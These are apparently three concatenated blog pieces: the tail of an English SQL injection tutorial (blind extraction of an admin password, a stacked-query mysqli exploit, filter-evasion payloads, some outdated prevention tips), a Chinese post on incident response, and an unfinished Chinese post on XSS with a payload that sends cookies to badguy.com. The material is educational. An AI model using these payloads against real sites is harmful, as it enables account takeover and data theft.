.:. (SELECT pwd FROM usr WHERE id=1) => SELECT the password of the user with ID=1 (admin)
.:. (SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1) => Get the first letter of the password (in this case ‘s’)
.:. ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) => Get the ASCII code of the first letter (115 in this case)

And how to retrieve the second letter of the password? Just carry out this query:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101 LIMIT 1

by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101

The third character? And the others? Just make the same query with the right values.
Take in mind that you can also use the “greater then” (>) and “less then” (<) symbols
instead of the equal; to find the ASCII letter between a range of letters.
Eg.: between 100 and 116; and so on.
——————————————————————————-[/]

—[ 0x07: Double Query ]

Sometimes in some codes happends that a programmer use the MySQLi Class (MySQL Improved
Extension) that is an extension allows you to access to the functionality provided
by MySQL 4.1 and above.

I’ll explain a  very interesting bug that could be very dangerous for the
system. A not properly sanitized variable passed in the method called multi_query of
the mysqli class can be used to perform a “double” sql query injection.

mysqli_multi_query (PHP 5) is able to performs one or more queries on the
database selected. The queries executed are concatenated by a semicolon.

Look this example to know what I’m talking about:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

<?php
$mysqli = new mysqli(“localhost”, “root”, “root”, “test”);

if (mysqli_connect_errno()) {
printf(“Connect failed: %s\n”, mysqli_connect_error());
exit();
}

$query  = “SELECT user FROM usr WHERE id =”. $_GET[‘id’].”;”;
$query .= “SELECT texts FROM news WHERE id =”. $_GET[‘id’];

echo ‘UserName: ‘;

if ($mysqli->multi_query($query)) {
do {
/* the first result set */
if ($result = $mysqli->store_result()) {
while ($row = $result->fetch_row()) {
echo ” – ” .$row[0]. “<br>” ;
}
$result->free();
}
/* print divider */
if ($mysqli->more_results()) {
echo “/-/-/-/-/-/-/-/-/-/-/-/-/-/<br>”;
}
} while ($mysqli->next_result());
}

/* close connection */
$mysqli->close();
?>

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

If a user request the follow URL:

http://www.victim.net/CMS/multiple.php?id=2

The browser reply with this information:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: – ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
– could be bypassed easily?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

But the source code is bugged. The $query variable is vulnerable because
a user can supply using the GET method, an evil id and can do multiple (evil) queries.

Trying with this request:

http://localhost/apache2-default/multiple1.php?id=2; SELECT pwd FROM usr/*

We will obtain the users passwords.

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: – ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
– secret
– adpwd
– test

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
——————————————————————————-[/]

—[ 0x08: Filters Evasion ]

Web Application could implements some input filters that prevent an attacker from
exploiting certain flaws such as SQL Injection, LFI or whatever. Therefore an application
can use some mechanism that are able to sanitize, block or parse in some ways
user-supply data. This kind of filters could be bypassed by using differents methods,
here I wanna try to give to you some ideas; but certainly one filter differ from
an other one so, you have to try/find different methods to bypass it.

– Imagine that we have to bypass a login form; but the comment symbol is blocked,
we can bypass this issue but injecting this data ‘ OR ‘a’ = ‘a instead of ‘ OR 1 = 1 /*

– The filter try to prevent an SQL Injection by using this kind of Signature: ‘ or 1=1 (Case-insensitive).
An attacker can bypass this filter using ‘ OR ‘foobar’ = ‘foobar for example.

– Suppose that the application filter the keyword “admin”, to bypass this filter we have just
to use some MySQL functions such as CONCAT or CHAR for example:
union select * from usr where user = concat(‘adm’,’in’)/*
union select * from usr where user=char(97,100,109,105,110)/*

This is only a little part of “filter evasion techniques”. Different filters work
differently, I can’t stay on this topic forever; I just gave to you some ideas.
——————————————————————————-[/]

—[ 0x09: SQL Injection Prevention ]

How to prevent this type of attacks? Here below I just wanna write some
tips that you can use to make your web application more secure.

1.) The file php.ini located on our HD (/etc/php5/apache2/php.ini, /etc/apache2/php.ini,
and so on..) can help us with the magic quote functions. Other interesting functions can
be setted to On; take a look inside this file.

Magic quotes can be used to escape automatically with backslash the user-supply single-quote (‘),
double-quote (“), backslash (\) and NULL characters.
The 3 magic quotes directives are:

– magic_quotes_gpc, that affects HTTP request data such as GET, POST and COOKIE.
– magic_quotes_runtime, if enabled, most functions that return data from an external source, will have
quotes escaped with a backslash.
– magic_quotes_sybase, that escape the ‘ with ” instead of \’.

2.) deploy mod_security for example

3.) use functions such as addslashes() htmlspecialchars(), mysql_escape_string(), etc. to validate
every user inputs.

4.) For integer input validate it by casting the variable
——————————————————————————-[/]

—[ 0x10: Conclusion ]

Here we are, at the end of this paper. As said upon, I hope you enjoyed it and
for any questions please mail me.
——————————————————————————-[/]

浅谈安全事件响应

本文旨在探讨一下我眼中的安全事件的响应流程。

在讨论安全事件的响应流程之前,首先得先定义什么叫做安全事件。一般的病毒感染事件其实并不能称作安全事件,当病毒感染和传播扩大到一定的量或者严重影响了业务的正常运转的时候,此时就构成了安全事件。

安全事件包括但不限于以下几种情况:

1、某种病毒在短时间内迅速感染了大量计算机或者服务器

2、某种病毒引发了业务系统的瘫痪,严重影响业务的正常运行

3、大量计算机或者用户报告发现类似的可疑或者奇怪的文件或者行为,但是杀毒软件确无法识别

4、企业内部和外部系统遭到入侵

5、物理安全,比如:地震,洪水,海啸,盗窃等

针对以上的发生安全事件,一般的响应流程如下:

1、快速识别危险程度:这一步一般需要由安全事件经理(Security Incident Manager)与安全运维中心(Security Operation Center)紧急联系相关部门了解受影响的范围,从而判断事件的危险程度,比如是否涉及关键的业务系统(SAP系统),是否影响File Share server 或者是 DC等比较关键的核心IT服务器等。

2、制定应急响应计划:由SOC搜索响应计划知识库,判断是否此类安全事件已有类似的先例,如有参照之前的计划,否则制定全新的响应计划。

3、执行应急响应计划:由SOC按照已制定的计划,协调反病毒AV,Network,服务器以及其他相关部门执行。这个过程可能包括确认杀毒软件可 以查杀此类病毒及其变种,网络防火墙block所有可能连接C&C服务器的流量,服务器关闭所有的文件共享避免病毒传播,邮件服务器block所 有相关的Spam mail等。

4、沟通和反馈响应结果:定期向上级领导或者客户反馈和报告响应结果,比如:每个2-4小时通报一次最新的结果和情况。

5、对此次事件的后续追踪:分析事件的root cause,编写事件报告,总结并更新已有的响应计划,如是新的安全事件,则制定全新的响应计划并入知识库储备。

安全事件响应过程:

  • 识别(Identification)
  • 控制(Containment)
  • 消除(Eradication)
  • 恢复(Recovery)
  • 总结(Lesson Learned)

原始链接:

http://blog.csdn.net/wrflovecy/article/details/41326997

常见web漏洞之我见

这是我第一次写自己的技术博客,肯定有很多的不足和错误,如有不对之处,提前在此致歉并欢迎大家指正,文中部分引用已在文章结尾处的参考资料中列出,尊重原创,人人有责!

一直以来对web安全都很有兴趣,只是苦于现在的工作原因,并没有太多的时间和精力细细研究,今天突发奇想就是想把自己一直以来对web安全的理解和认知记录一下,一是做一个知识的总结,二也是方便自己日后的查阅。

说起web安全,那么就不得不提一下以下的常见漏洞和一般的防御方法。

一、 XSS (cross site scripting)

跨站脚本注入,是一个非常常见的web漏洞,也是见诸于各大web站点的常见漏洞, 主要分为以下3类:

1. 反射型XSS,

之所以称之为“反射型”,主要是因为通常恶意代码都没有保存在目标网站上,而是通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。

实施这种攻击的步骤如下图所示。

(点击查看大图)图12-3 反射型XSS攻击的实施步骤

(1) 用户正常登录应用程序,得到一个包含会话令牌的 cookie:

(2) 攻击者通过某种方法(详情见下文)向用户提交以下 URL:

和前面生成一个对话框消息的示例一样,这个URL包含嵌入式 JavaScript 代码。但是,这个示例中的攻击有效载荷更加恶毒。

(3) 用户从应用程序中请求攻击者传送给他们的URL。

(4) 服务器响应用户的请求。由于应用程序中存在XSS漏洞,响应中包含攻击者创建的 JavaScript代码。

(5) 用户浏览器收到攻击者的JavaScript代码,像执行从应用程序收到的其他代码一样,浏览器执行这段代码。

(6) 攻击者创建的恶意JavaScript代码为:

这段代码可让用户浏览器向wahh-attacker.com(攻击者拥有的一个域)提出一个请求。请求中包含用户访问应用程序的当前会话令牌:

攻击者监控访问wahh-attacker.com的请求并收到用户的请求。攻击者使用截获的令牌劫持用户的会话,从而访问该用户的个人信息,并”代表”该用户执行任意操作。

2. 存储型XSS

恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也 能看到它身影,比如:某CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员查看投诉信息时恶意代码执行,窃取了客户 的资料,然而管理员毫不知情,这就是典型的XSS存储型攻击。

攻击过程如下:

Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,

Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。

其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。

3. 基于DOM的XSS

在这种漏洞中,攻击者的JavaScript通过以下过程得以执行。

用户请求一个经过专门设计的URL,它由攻击者提交,且其中包含嵌入式JavaScript。

服务器的响应中并不以任何形式包含攻击者的脚本。

当用户的浏览器处理这个响应时,上述脚本得以处理。

这一系列事件如何发生呢?由于客户端JavaScript可以访问浏览器的文本对象模型(Document Object Model,DOM),因此它能够决定用于加载当前页面的 URL。由应用程序发布的一段脚本可以从URL中提取数据,对这些数据进行处理,然后用它动态更新页面的内容。如果这样,应用程序就可能易于受到基于 DOM的XSS攻击。

回到前面的反射型XSS漏洞中的示例,其中服务器端应用程序将一个URL参数值复制到一条错误消息中。另一种实现相同功能的办法是由应用程序每次返回相同的静态 HTML,并使用客户端JavaScript动态生成消息内容。

例如,假设应用程序返回的错误页面包含以下脚本:

这段脚本解析 URL,提取出message参数的值,并把这个值写入页面的HTML源代码中。如果按开发者预想的方式调用,它可以和前面的示例中一样,用于创建错误消 息。但是,如果攻击者设计出一个 URL,并以JavaScript代码作为message参数,那么这段代码将被动态写入页面中,并像服务器返回代码一样得以执行。在这个示例中,前面示 例中利用反射型XSS漏洞的相同URL也可用于生成一个对话框:

  1. https://wahh-app.com/error.php?message=<script>alert(‘xss’);</script>

利用基于DOM的XSS漏洞的过程如图12-5所示。

(点击查看大图)图12-5 基于DOM的XSS攻击的实施步骤

与保存型XSS漏洞相比,基于DOM的XSS漏洞与反射型XSS漏洞有更大的相似性。利用它们通常需要攻击者诱使一名用户访问一个包含恶意代码的专门设计的URL,并由服务器响应那个使得恶意代码得以执行的特殊请求。

举个例子:

Tom 发现了Victim.com中的一个页面有XSS漏洞,

例如: http://victim.com/search.asp?term=apple

服务器中Search.asp 页面的代码大概如下

复制代码
<html>
  <title></title>
  <body>
    Results  for  <%Reequest.QueryString("term")%>
    ...
  </body>
</html>
复制代码

Tom 先建立一个网站http://badguy.com,  用来接收“偷”来的信息。
然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件,QQ)发给Monica

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica点击了这个URL, 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.

(未完待续…)

参考资料:

http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html

http://www.cnblogs.com/Jackson-Bruce/p/XSS-Attachs.html

http://www.cnblogs.com/hyddd/archive/2009/04/09/1432744.html

http://blog.csdn.net/stilling2006/article/details/8526458

http://book.51cto.com/art/200907/138873.htm

http://blog.csdn.net/wrflovecy/article/details/41260591